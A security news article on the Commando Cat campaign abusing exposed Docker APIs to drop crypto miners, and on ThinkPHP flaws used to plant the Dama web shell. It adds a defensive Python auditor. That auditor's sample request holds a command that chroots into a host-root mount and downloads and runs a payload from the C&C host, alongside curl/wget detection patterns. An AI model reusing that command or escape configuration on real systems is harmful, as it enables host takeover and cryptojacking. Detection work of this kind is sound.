The threat actor known as Commando Cat has been linked to an ongoing cryptojacking campaign that leverages poorly secured Docker instances to deploy cryptocurrency miners for financial gain.
"The attackers used the cmd.cat/chattr docker image container that retrieves the payload from their own command-and-control (C&C) infrastructure," Trend Micro researchers Sunil Bharti and Shubham Singh said in a Thursday analysis.
Commando Cat, so named for its use of the open-source Commando project to create a benign container, was first documented earlier this year by Cado Security.
The attacks are characterized by the targeting of misconfigured Docker remote API servers to deploy a Docker image named cmd.cat/chattr, which is then used as a base to instantiate a container and break out of its confines using the chroot command, gaining access to the host operating system. The chroot step only reaches the host because the container is created with the host's root filesystem bind-mounted into it; chroot on its own does not escape a properly isolated container, which is why an unauthenticated remote API that accepts arbitrary mount and privilege settings is the real enabler here.
The final step involves retrieving the malicious miner binary using a curl or wget command from a C&C server ("leetdbs.anondns[.]net/z") by means of a shell script. The binary is suspected to be ZiggyStarTux, an open-source IRC bot based on the Kaiten (aka Tsunami) malware.
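The pattern described above (host root bind-mounted into a container, extra privileges, and a command that chroots into the mount and pulls a payload with curl or wget) is easy to express as a check over Docker Engine API `containers/create` request bodies. The following is an added example written for this page, not code from Trend Micro, Cado Security or the attackers; the sample requests, the `/host` mount path and the payload file name are constructed for illustration, and the only indicators taken from the article are the image name and the defanged C&C host.

```python
"""Audit Docker Engine API `containers/create` request bodies for the
container-to-host takeover pattern used in the Commando Cat campaign.
Added example for this page; constructed data, not captured traffic."""

import json
import re

# Indicator from the article; any other image name here would be an assumption.
SUSPICIOUS_IMAGES = {"cmd.cat/chattr"}
DOWNLOADER_RE = re.compile(r"\b(curl|wget)\b")
CHROOT_RE = re.compile(r"\bchroot\b")


def _as_list(value):
    """Docker accepts Cmd/Entrypoint as either a string or a list."""
    if value is None:
        return []
    return [value] if isinstance(value, str) else list(value)


def _command_text(cfg):
    return " ".join(_as_list(cfg.get("Entrypoint")) + _as_list(cfg.get("Cmd")))


def audit_create_request(cfg):
    """Return a list of (severity, finding) tuples for one create request."""
    findings = []
    host = cfg.get("HostConfig") or {}
    image = cfg.get("Image", "")
    if image in SUSPICIOUS_IMAGES:
        findings.append(("high", f"image {image} is a known Commando Cat indicator"))
    # Legacy "Binds": "src:dst[:opts]"; the host root as source is the escape path.
    for bind in host.get("Binds") or []:
        if bind.split(":", 1)[0] == "/":
            findings.append(("high", f"host root filesystem bind-mounted: {bind}"))
    # Newer "Mounts" objects express the same thing.
    for mount in host.get("Mounts") or []:
        if mount.get("Type") == "bind" and mount.get("Source") == "/":
            findings.append(("high", f"host root filesystem mounted at {mount.get('Target')}"))
    if host.get("Privileged"):
        findings.append(("high", "container requested --privileged"))
    if host.get("PidMode") == "host":
        findings.append(("medium", "container shares the host PID namespace"))
    cmd = _command_text(cfg)
    if CHROOT_RE.search(cmd) and DOWNLOADER_RE.search(cmd):
        findings.append(("high", "command chroots and fetches a payload with curl/wget"))
    elif CHROOT_RE.search(cmd):
        findings.append(("medium", "command invokes chroot"))
    return findings


def max_severity(findings):
    """0 = clean, 1 = medium, 2 = high; handy for alert routing."""
    order = {"high": 2, "medium": 1}
    return max((order[sev] for sev, _ in findings), default=0)


# Constructed sample of what an unauthenticated POST /containers/create
# matching the described tradecraft could look like. The /host mount path
# and the /tmp/z payload name are assumptions, not from the report.
MALICIOUS = json.loads("""{
  "Image": "cmd.cat/chattr",
  "Cmd": ["sh", "-c",
          "chroot /host sh -c 'curl -s http://leetdbs.anondns[.]net/z -o /tmp/z && chmod +x /tmp/z && /tmp/z'"],
  "HostConfig": {"Binds": ["/:/host"], "Privileged": true, "PidMode": "host"}
}""")

# Constructed benign request: a read-only bind of a web root, no privileges.
BENIGN = json.loads("""{
  "Image": "nginx:1.25",
  "Cmd": ["nginx", "-g", "daemon off;"],
  "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"]}
}""")

if __name__ == "__main__":
    for name, cfg in (("malicious", MALICIOUS), ("benign", BENIGN)):
        print(name, max_severity(audit_create_request(cfg)), audit_create_request(cfg))
```

The same function works on `docker inspect` output if you first lift `Config.Image`, `Config.Cmd` and `Config.Entrypoint` next to the top-level `HostConfig`, and on request bodies logged by a reverse proxy placed in front of the daemon socket. The image-name match is the weakest signal; the host-root mount and `--privileged` flags are what actually grant the escape and should be alerted on regardless of image.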
"The significance of this attack campaign lies in its use of Docker images to deploy cryptojacking scripts on compromised systems," the researchers said. "This tactic allows attackers to exploit vulnerabilities in Docker configurations while evading detection by security software."
The disclosure comes as Akamai revealed that years-old security flaws in ThinkPHP applications (e.g., CVE-2018-20062 and CVE-2019-9082) are being exploited by a suspected Chinese-speaking threat actor to deliver a web shell dubbed Dama as part of a campaign that has been underway since October 17, 2023.
"The exploit attempts to retrieve additional obfuscated code from another compromised ThinkPHP server to gain initial foothold," Akamai researchers Ron Mankivsky and Maxim Zavodchik said. "After successfully exploiting the system, the attackers will install a Chinese language web shell named Dama to maintain persistent access to the server."
The web shell is equipped with several advanced capabilities to collect system information, upload files, scan network ports, escalate privileges, and navigate the file system, the latter of which allows threat actors to carry out operations such as file editing, deletion, and timestamp modification for obfuscation purposes.
"The recent attacks originated by a Chinese-speaking adversary highlight an ongoing trend of attackers using a fully fledged web shell, designed for advanced victim control," the researchers noted. "Interestingly, not all targeted customers were using ThinkPHP, which suggests that the attackers may be indiscriminately targeting a broad range of systems."
Some sections of this article are sourced from:
thehackernews.com